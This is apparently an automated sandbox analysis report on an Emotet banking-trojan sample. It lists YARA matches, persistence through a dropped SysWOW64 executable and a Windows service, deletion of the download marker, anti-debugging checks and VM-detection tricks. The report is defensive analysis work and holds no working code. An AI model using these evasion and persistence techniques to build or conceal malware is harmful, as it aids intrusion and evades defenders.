Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0040BDDB2_2_0040BDDB
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043DEBD2_2_0043DEBD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_005F28C12_2_005F28C1
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_005F30E82_2_005F30E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_005F30E42_2_005F30E4
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 3_2_006037A53_2_006037A5
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 3_2_006037A93_2_006037A9
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 3_2_00602F823_2_00602F82
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_006430E44_2_006430E4
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_006430E84_2_006430E8
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_006428C14_2_006428C1
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F537A54_2_00F537A5
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F537A94_2_00F537A9
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F52F824_2_00F52F82
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 00401220 appears 36 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 00403520 appears 70 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 0043B240 appears 194 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 00409714 appears 58 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 0043AFA9 appears 72 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 00442074 appears 44 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 0045255A appears 38 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 004093F0 appears 32 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 00449972 appears 92 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 0043AF40 appears 454 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 004138C5 appears 70 times
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: String function: 0043AF73 appears 54 times
Sample file is different than original file name gathered from version infoShow sources
Source: 3ki05193698.exe.exe, 00000000.00000002.1999310109.0000000000489000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefrom the White House Office of Management and Budget vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000000.1998673040.0000000000489000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamefrom the White House Office of Management and Budget vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000002.2032207214.00000000024B0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000002.2032207214.00000000024B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exe, 00000002.00000002.2033069300.0000000002930000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 3ki05193698.exe.exe
Source: 3ki05193698.exe.exeBinary or memory string: OriginalFilenamefrom the White House Office of Management and Budget vs 3ki05193698.exe.exe
Yara signature matchShow sources
Source: 00000000.00000002.1999763726.0000000002281000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000002.00000002.2031798136.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000000.00000002.1999620941.0000000000740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2792994904.0000000000640000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2029903542.0000000000601000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000003.00000002.2029828683.00000000004A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000004.00000002.2793212106.0000000000F51000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Source: 00000002.00000002.2031865725.00000000006A1000.00000020.00000001.sdmp, type: MEMORYMatched rule: Emotet author = kevoreilly, description = Emotet Payload, cape_type = Emotet Payload
Classification labelShow sources
Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@6/0@0/1
Contains functionality to create servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_00F5E4A8
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_02281943 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_02281943
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00423866 __EH_prolog3_GS,_memset,GetVersionExA,_malloc,_memset,CoInitializeEx,CoCreateInstance,0_2_00423866
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004060CC __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z,__EH_prolog3_catch,FindResourceA,LoadResource,LockResource,GetDesktopWindow,IsWindowEnabled,EnableWindow,EnableWindow,GetActiveWindow,SetActiveWindow,FreeResource,0_2_004060CC
Contains functionality to modify services (start/stop/modify)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F5E4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_00F5E4A8
Creates mutexesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeMutant created: \BaseNamedObjects\Global\I41D33F40
PE file has an executable .text section and no other executable sectionShow sources
Source: 3ki05193698.exe.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: 3ki05193698.exe.exeVirustotal: Detection: 77%
Sample requires command line parameters (based on API chain)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-55902
Source: C:\Windows\SysWOW64\driverthunk.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\3ki05193698.exe.exe 'C:\Users\user\Desktop\3ki05193698.exe.exe'
Source: unknownProcess created: C:\Users\user\Desktop\3ki05193698.exe.exe --97a1abae
Source: unknownProcess created: C:\Windows\SysWOW64\driverthunk.exe C:\Windows\SysWOW64\driverthunk.exe
Source: unknownProcess created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0c
Source: C:\Users\user\Desktop\3ki05193698.exe.exeProcess created: C:\Users\user\Desktop\3ki05193698.exe.exe --97a1abaeJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess created: C:\Windows\SysWOW64\driverthunk.exe --4d57fc0cJump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
PE file contains a debug data directoryShow sources
Source: 3ki05193698.exe.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Binary contains paths to debug symbolsShow sources
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb source: 3ki05193698.exe.exe
Source: Binary string: c:\Users\User\Desktop\2008\XFontDialog_demo\vs6\Release\XFontDialogTest.pdb H0mG source: 3ki05193698.exe.exe

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0045A702
PE file contains an invalid checksumShow sources
Source: 3ki05193698.exe.exeStatic PE information: real checksum: 0xa5dce should be: 0xa5f77
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0040C4CB push edi; ret 0_2_0040C4CC
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0040C4D3 push ds; ret 0_2_0040C4D4
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0040C4E7 push edi; ret 0_2_0040C4E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043B018 push ecx; ret 0_2_0043B02B
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043B285 push ecx; ret 0_2_0043B298
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0040C4CB push edi; ret 2_2_0040C4CC
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0040C4D3 push ds; ret 2_2_0040C4D4
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0040C4E7 push edi; ret 2_2_0040C4E8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043B018 push ecx; ret 2_2_0043B02B
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0043B285 push ecx; ret 2_2_0043B298

Persistence and Installation Behavior:

barindex
Drops executables to the windows directory (C:\Windows) and starts themShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeExecutable created and started: C:\Windows\SysWOW64\driverthunk.exeJump to behavior
Drops PE files to the windows directory (C:\Windows)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exePE file moved: C:\Windows\SysWOW64\driverthunk.exeJump to behavior

Boot Survival:

barindex
Contains functionality to start windows servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F5E4A8 OpenSCManagerW,_snwprintf,CreateServiceW,OpenServiceW,ChangeServiceConfig2W,StartServiceW,CloseServiceHandle,CloseServiceHandle,4_2_00F5E4A8

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeFile opened: C:\Windows\SysWOW64\driverthunk.exe:Zone.Identifier read attributes | deleteJump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00406670 IsIconic,GetWindowPlacement,GetWindowRect,0_2_00406670
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0042EAB8 IsWindowVisible,IsIconic,0_2_0042EAB8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00403100 IsIconic,0_2_00403100
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00403300 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,0_2_00403300
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00427655 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,0_2_00427655
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00406670 IsIconic,GetWindowPlacement,GetWindowRect,2_2_00406670
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0042EAB8 IsWindowVisible,IsIconic,2_2_0042EAB8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00403100 IsIconic,2_2_00403100
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00403300 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,2_2_00403300
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00427655 __ehhandler$?enable_segment@_Helper@_Concurrent_vector_base_v4@details@Concurrency@@SAIAAV234@II@Z,__EH_prolog3,IsIconic,SetForegroundWindow,SendMessageA,PostMessageA,2_2_00427655
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3ki05193698.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3ki05193698.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3ki05193698.exe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\SysWOW64\driverthunk.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Contains functionality to enumerate running servicesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: EnumServicesStatusExW,GetLastError,EnumServicesStatusExW,GetTickCount,OpenServiceW,QueryServiceConfig2W,GetLastError,QueryServiceConfig2W,CloseServiceHandle,4_2_00F5E20C
Found evasive API chain (date check)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-55739
Found evasive API chain (may stop execution after checking a module file name)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-55678
Found large amount of non-executed APIsShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeAPI coverage: 3.2 %
Source: C:\Users\user\Desktop\3ki05193698.exe.exeAPI coverage: 2.8 %
Source: C:\Windows\SysWOW64\driverthunk.exeAPI coverage: 7.2 %
Program does not show much activity (idle)Show sources
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Checks the free space of harddrivesShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_004305BD lstrlenA,FindFirstFileA,FindClose,0_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,0_2_0042885D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_004305BD lstrlenA,FindFirstFileA,FindClose,2_2_004305BD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0042885D __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,2_2_0042885D
Contains functionality to query system informationShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043E50E VirtualQuery,GetSystemInfo,GetModuleHandleW,GetProcAddress,VirtualAlloc,VirtualProtect,0_2_0043E50E
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)Show sources
Source: driverthunk.exe, 00000004.00000002.2793127886.00000000006B1000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Program exit pointsShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeAPI call chain: ExitProcess graph end nodegraph_0-56156
Source: C:\Users\user\Desktop\3ki05193698.exe.exeAPI call chain: ExitProcess graph end nodegraph_2-53940
Source: C:\Windows\SysWOW64\driverthunk.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exeAPI call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\driverthunk.exeAPI call chain: ExitProcess graph end node
Queries a list of all running processesShow sources
Source: C:\Windows\SysWOW64\driverthunk.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00442D24
Contains functionality to create guard pages, often used to hinder reverse engineering and debuggingShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0043E50E VirtualProtect ?,-00000001,00000104,?0_2_0043E50E
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0045A702 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0045A702
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00402960 mov eax, dword ptr fs:[00000030h]0_2_00402960
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00740467 mov eax, dword ptr fs:[00000030h]0_2_00740467
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00740C0C mov eax, dword ptr fs:[00000030h]0_2_00740C0C
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00741743 mov eax, dword ptr fs:[00000030h]0_2_00741743
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_022812CD mov eax, dword ptr fs:[00000030h]0_2_022812CD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_02281E04 mov eax, dword ptr fs:[00000030h]0_2_02281E04
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00402960 mov eax, dword ptr fs:[00000030h]2_2_00402960
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_005F0467 mov eax, dword ptr fs:[00000030h]2_2_005F0467
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_005F0C0C mov eax, dword ptr fs:[00000030h]2_2_005F0C0C
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_005F1743 mov eax, dword ptr fs:[00000030h]2_2_005F1743
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 3_2_00601E04 mov eax, dword ptr fs:[00000030h]3_2_00601E04
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 3_2_006012CD mov eax, dword ptr fs:[00000030h]3_2_006012CD
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00640467 mov eax, dword ptr fs:[00000030h]4_2_00640467
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00640C0C mov eax, dword ptr fs:[00000030h]4_2_00640C0C
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00641743 mov eax, dword ptr fs:[00000030h]4_2_00641743
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F512CD mov eax, dword ptr fs:[00000030h]4_2_00F512CD
Source: C:\Windows\SysWOW64\driverthunk.exeCode function: 4_2_00F51E04 mov eax, dword ptr fs:[00000030h]4_2_00F51E04
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_02282561 GetProcessHeap,RtlAllocateHeap,0_2_02282561
Program does not show much activity (idle)Show sources
Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00448BF8 SetUnhandledExceptionFilter,0_2_00448BF8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00442D24
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_0044ADDD __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0044ADDD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 0_2_00439CC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00439CC7
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00448BF8 SetUnhandledExceptionFilter,2_2_00448BF8
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00442D24 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00442D24
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_0044ADDD __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0044ADDD
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: 2_2_00439CC7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00439CC7

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,0_2_00414177
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_004565B2
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,0_2_0045872B
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00458842
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,0_2_004588DA
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,0_2_0045894E
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00458B20
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strlen,EnumSystemLocalesA,0_2_00458BE4
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,0_2_00456C53
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00458C74
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00458C0D
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,0_2_00458CB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement,0_2_00456EDE
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA,0_2_0045AF55
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoW,0_2_0045AF08
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW,0_2_0044AF15
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW,0_2_0045AF21
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoA,0_2_00458FB0
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0045B094
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,0_2_004571A4
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,2_2_00414177
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004565B2
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetACP,2_2_0045872B
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,2_2_00458842
Source: C:\Users\user\Desktop\3ki05193698.exe.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,2_2_004588DA
